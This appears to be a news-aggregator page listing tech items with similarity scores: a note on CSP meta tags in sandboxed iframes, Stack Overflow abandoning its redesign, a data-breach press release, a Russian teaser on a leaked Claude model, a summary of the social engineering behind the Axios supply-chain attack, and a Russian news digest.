Search Engine
Software Bill of Materials
Software bug
Software License
Spamming
Spyware
Star Wars
Surveillance
Tensor Processing Unit
Text Editor
TLS
TOPS
Trojan
Trusted Platform Module
User interface
Visual Studio
Visual Studio Code
Vulnerability
Wannacry
WebAssembly
Web Browser
Wikipedia
WordPress
WPF
Zero trust
Broader topics
Self-driving Car
More about
Share
12
COMMENTS
More about
AI
Open Source
Security
More like these
×
More about
AI
Open Source
Security
Software
Narrower topics
2FA
AdBlock Plus
Advanced persistent threat
AIOps
App
Application Delivery Controller
Audacity
Authentication
BEC
Black Hat
BSides
Bug Bounty
Center for Internet Security
CHERI
CISO
Common Vulnerability Scoring System
Confluence
Cybercrime
Cybersecurity
Cybersecurity and Infrastructure Security Agency
Cybersecurity Information Sharing Act
Database
Data Breach
Data Protection
Data Theft
DDoS
DeepSeek
DEF CON
Digital certificate
Digital Public Goods
Encryption
End Point Protection
Exploit
Firewall
FOSDEM
FOSS
Gemini
Google AI
Google Project Zero
GPT-3
GPT-4
Grab
Graphics Interchange Format
Hacker
Hacking
Hacktivism
IDE
Identity Theft
Image compression
Incident response
Infosec
Infrastructure Security
Jenkins
Kenna Security
Large Language Model
Legacy Technology
LibreOffice
Machine Learning
Map
MCubed
Microsoft 365
Microsoft Office
Microsoft Teams
Mobile Device Management
MySQL
NCSAM
NCSC
Neural Networks
NLP
OpenInfra
OpenOffice
OpenStack
Palo Alto Networks
Password
Personally Identifiable Information
Phishing
Programming Language
Proxmox
QR code
Quantum key distribution
Ransomware
Remote Access Trojan
Retrieval Augmented Generation
Retro computing
REvil
RSA Conference
Search Engine
Software Bill of Materials
Software bug
Software License
Spamming
Spyware
Star Wars
Surveillance
Tensor Processing Unit
Text Editor
TLS
TOPS
Trojan
Trusted Platform Module
User interface
Visual Studio
Visual Studio Code
Vulnerability
Wannacry
WebAssembly
Web Browser
Wikipedia
WordPress
WPF
Zero trust
Broader topics
Self-driving Car
TIP US OFF
Send us news
|
|
|
Can JavaScript Escape a CSP Meta Tag Inside an Iframe? |
simon_willison |
03.04.2026 16:05 |
0.634
|
| Embedding sim. | 0.7414 |
| Entity overlap | 0.0769 |
| Title sim. | 0.0385 |
| Time proximity | 0.866 |
| NLP тип | other |
| NLP организация | |
| NLP тема | cybersecurity |
| NLP страна | |
Открыть оригинал
Research: Can JavaScript Escape a CSP Meta Tag Inside an Iframe?
In trying to build my own version of Claude Artifacts I got curious about options for applying CSP headers to content in sandboxed iframes without using a separate domain to host the files. Turns out you can inject <meta http-equiv="Content-Security-Policy"...> tags at the top of the iframe content and they'll be obeyed even if subsequent untrusted JavaScript tries to manipulate them.
Tags: iframes , security , javascript , content-security-policy , sandboxing
|
|
|
Stack Overflow abandons redesign beta after criticism |
the_register_ai |
07.04.2026 16:26 |
0.631
|
| Embedding sim. | 0.7197 |
| Entity overlap | 0.2 |
| Title sim. | 0.0842 |
| Time proximity | 0.8919 |
| NLP тип | other |
| NLP организация | Stack Overflow |
| NLP тема | developer tools |
| NLP страна | |
Открыть оригинал
Devops
25
Stack Overflow abandons redesign after loyalists criticize it
25
Fabled Q&A site for devs struggles with its future as AI takes over its original purpose
Tim Anderson
Tue 7 Apr 2026 //
16:26 UTC
Stack Overflow, the once-popular dev community, has abandoned a planned redesign that was meant to refocus the site more on discussions than the question-and-answer format that built its reputation.
Philippe Beaudette, VP community, announced the change in a post last week.
"We will be retiring the beta shortly and will be removing the button to get to it and ceasing support for it," he said.
The beta garnered negative feedback from the Stack Overflow community, including observations that it looked more like a general discussion site such as Reddit and was losing the essence of what made it successful: precise questions and community-validated answers.
Once the favored destination for developers stuck with a coding problem, Stack Overflow has seen its traffic dwindle thanks to AI-driven answers surfaced directly in IDEs (integrated development environments).
The Stack Overflow beta site redesign, now to be abandoned - Click to enlarge
The beta design changes were not just visual. When it was launched in February, the company stated that "we plan to retire certain curation workflows, such as close votes and most review queues," a huge change for a site known for its tendency to reject questions for being duplicates, off-topic, or unclear. That tendency has also fed a reputation for being hostile to newcomers, causing a further decline in traffic.
The Stack Overflow community disliked that a changed visual design was munged together with a different moderation policy. "Burying this fundamental aspect of how the site works half way through a post that claims to be about 'new site design' - with an implication that it's mostly cosmetic - feels like you know it's going to be unpopular, and were trying to hide it," said one highly upvoted comment .
That said, the proposal to change curation of questions was not new. In December 2025, an official post said that "We propose a radical shift: stop closing questions and introduce a new curation model," while also observing that it was odd to be rejecting 40 to 50 percent of questions when so few are now being posted.
Stack Overflow has also experimented with what the site called "opinion-based questions," allowing users to tag questions with labels such as "best practice" or "general advice," rather than all questions having to be about a specific technical issue. This is now part of the main site and Beaudette said that "we will retain them as they currently are."
Baudette said that the beta had been successful in "eliminating ideas that don't work" but the site is in a tough spot. The failure of its beta redesign highlights the barriers to change, while the decline in traffic shows that the old model no longer works as once it did.
Generative AI is vulnerable to mistakes and hallucinations, making a human-curated source of developer information particularly valuable.
It seems that Stack Overflow is uncertain what comes next. "We aren't 'changing our mind', exactly, because we had never settled on what would deploy," said Baudette.®
Share
More about
AI
Stack Overflow
More like these
×
More about
AI
Stack Overflow
Narrower topics
AIOps
DeepSeek
Gemini
Google AI
GPT-3
GPT-4
Large Language Model
Machine Learning
MCubed
Neural Networks
NLP
Retrieval Augmented Generation
Star Wars
Tensor Processing Unit
TOPS
Broader topics
Self-driving Car
More about
Share
25
COMMENTS
More about
AI
Stack Overflow
More like these
×
More about
AI
Stack Overflow
Narrower topics
AIOps
DeepSeek
Gemini
Google AI
GPT-3
GPT-4
Large Language Model
Machine Learning
MCubed
Neural Networks
NLP
Retrieval Augmented Generation
Star Wars
Tensor Processing Unit
TOPS
Broader topics
Self-driving Car
TIP US OFF
Send us news
|
|
|
Data Breach Alert: Edelson Lechtzin LLP Investigates Figure Lending Corp. Data Breach Affecting Nearly 1 Million Users |
prnewswire |
10.04.2026 02:36 |
0.63
|
| Embedding sim. | 0.7338 |
| Entity overlap | 0.0455 |
| Title sim. | 0.0909 |
| Time proximity | 0.8325 |
| NLP тип | other |
| NLP организация | Edelson Lechtzin LLP |
| NLP тема | data privacy |
| NLP страна | United States |
Открыть оригинал
Data Breach Alert: Edelson Lechtzin LLP Investigates Figure Lending Corp. Data Breach Affecting Nearly 1 Million Users
News provided by
Edelson Lechtzin LLP
Apr 09, 2026, 22:36 ET
Share this article
Share to X
Share this article
Share to X
CHARLOTTE, N.C. , April 9, 2026 /PRNewswire/ -- Edelson Lechtzin LLP, a national class action law firm, is actively investigating data privacy claims arising from the Figure Lending Corp. data breach. On January 28, 2026, Figure Technology experienced an incident in which personal data was accessed via database queries involving loan and inquiry records.
Key Facts About Figure Lending Corp.
Figure Lending Corp. (d/b/a Figure) is a fintech firm using blockchain technology to offer quick home equity loans, refinancing, and crypto -backed lending services.
Figure Lending Corp. discovered that personal information was retrieved by querying company databases containing records of loans and loan inquiries.
Following an investigation, they discovered that certain personal data may have been acquired, including names, Social Security numbers, addresses, phone numbers, email addresses, dates of birth, loan account numbers, and loan information.
Are You Affected by the Figure Lending Corp. Data Breach?
If you received a data breach notification, you may be at increased risk of identity theft and fraud . Recommended steps include regularly reviewing account statements and monitoring credit reports for suspicious activity.
Our Investigation and Your Legal Options
Edelson Lechtzin LLP is investigating a class action seeking legal remedies for individuals whose sensitive personal data may have been compromised in the Figure Lending Corp. breach. We can help you evaluate your rights and potential claims at no cost.
Contact Us for a Free Case Evaluation
Speak confidentially with a data privacy attorney today: Marc Edelson, Esq., Edelson Lechtzin LLP, 411 S. State Street, Suite N-300, Newtown, PA 18940; Phone: 844-696-7492 ext. 2; Email: [email protected] ; Web: www.edelson-law.com . Or click HERE to request a free consultation.
Why Choose Edelson Lechtzin LLP
Edelson Lechtzin LLP is a national class action law firm with offices in Pennsylvania and California. Beyond data breach litigation, our attorneys handle class and collective actions involving securities and investment fraud , federal antitrust violations, ERISA employee benefit plans, wage theft, and consumer fraud .
Protect Yourself Now
Confirm whether your information was involved in the Figure Lending Corp. incident
Place fraud alerts and consider credit monitoring [if available]
Preserve any letters or emails you received about the breach
Contact our firm to discuss your legal options and next steps
Media and Partnership Inquiries: Use the contact information above to connect with our team regarding interviews, co-counsel opportunities, and referral partnerships.
Legal Notice: This press release may be considered Attorney Advertising in some jurisdictions.
SOURCE Edelson Lechtzin LLP
21 %
more press release views with
Request a Demo
×
Modal title
|
|
|
[Перевод] 10 триллионов параметров и статус «слишком опасна»: что мы знаем о Claude Mythos |
habr_ai |
01.04.2026 18:13 |
0.63
|
| Embedding sim. | 0.7144 |
| Entity overlap | 0 |
| Title sim. | 0.1346 |
| Time proximity | 0.9713 |
| NLP тип | product_launch |
| NLP организация | Anthropic |
| NLP тема | large language models |
| NLP страна | |
Открыть оригинал
Claude Mythos — это новая супер-ИИ модель, которую Anthropic пока не хочет вам показывать.
Утечка указывает на то, что она далеко превосходит Opus 4.6 — и, возможно, слишком мощная для публичного релиза.
Это не похоже на обычный хайп-цикл ИИ-моделей: Anthropic случайно оставила в публичном доступе черновики блог-постов, внутренние документы и почти 3 000 неопубликованных материалов в открытом кэше данных.
Их обнаружили два исследователя кибербезопасности.
Модель называется Claude Mythos , и собственные слова Anthropic описывают её как «безусловно самую мощную ИИ-модель, которую мы когда-либо разрабатывали».
Anthropic подтвердила утечку — представитель компании назвал это «качественным скачком» в производительности ИИ и сообщил, что клиенты с ранним доступом уже тестируют модель.
Так что же такое Claude Mythos, и чем она отличается от моделей Opus и Sonnet?
Читать далее
|
|
|
The Axios supply chain attack used individually targeted social engineering |
simon_willison |
03.04.2026 13:54 |
0.629
|
| Embedding sim. | 0.7239 |
| Entity overlap | 0.1429 |
| Title sim. | 0.075 |
| Time proximity | 0.8789 |
| NLP тип | other |
| NLP организация | Axios |
| NLP тема | cybersecurity |
| NLP страна | |
Открыть оригинал
The Axios team have published a full postmortem on the supply chain attack which resulted in a malware dependency going out in a release the other day , and it involved a sophisticated social engineering campaign targeting one of their maintainers directly. Here's Jason Saayman'a description of how that worked :
so the attack vector mimics what google has documented here: https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering
they tailored this process specifically to me by doing the following:
they reached out masquerading as the founder of a company they had cloned the companys founders likeness as well as the company itself.
they then invited me to a real slack workspace. this workspace was branded to the companies ci and named in a plausible manner. the slack was thought out very well, they had channels where they were sharing linked-in posts, the linked in posts i presume just went to the real companys account but it was super convincing etc. they even had what i presume were fake profiles of the team of the company but also number of other oss maintainers.
they scheduled a meeting with me to connect. the meeting was on ms teams. the meeting had what seemed to be a group of people that were involved.
the meeting said something on my system was out of date. i installed the missing item as i presumed it was something to do with teams, and this was the RAT.
everything was extremely well co-ordinated looked legit and was done in a professional manner.
A RAT is a Remote Access Trojan - this was the software which stole the developer's credentials which could then be used to publish the malicious package.
That's a very effective scam. I join a lot of meetings where I find myself needing to install Webex or Microsoft Teams or similar at the last moment and the time constraint means I always click "yes" to things as quickly as possible to make sure I don't join late.
Every maintainer of open source software used by enough people to be worth taking in this way needs to be familiar with this attack strategy.
Tags: open-source , packaging , security , social-engineering , supply-chain
|
|
|
Рунет пытаются окуклить, а также закон о реестре криптокошельков россиян |
habr_ai |
06.04.2026 04:53 |
0.623
|
| Embedding sim. | 0.7463 |
| Entity overlap | 0.0645 |
| Title sim. | 0 |
| Time proximity | 0.7477 |
| NLP тип | other |
| NLP организация | SpaceX |
| NLP тема | ai regulation |
| NLP страна | Russia |
Открыть оригинал
Самые интересные новости финансов и технологий в России и мире за неделю: лимит на зарубежный инет-трафик в России, банковская инфраструктура РФ поломалась на день, IPO SpaceX целит уже на $2 трлн, OpenAI купили подкаст для псиопов, а у Claude Code утек исходный код.
Читать далее
|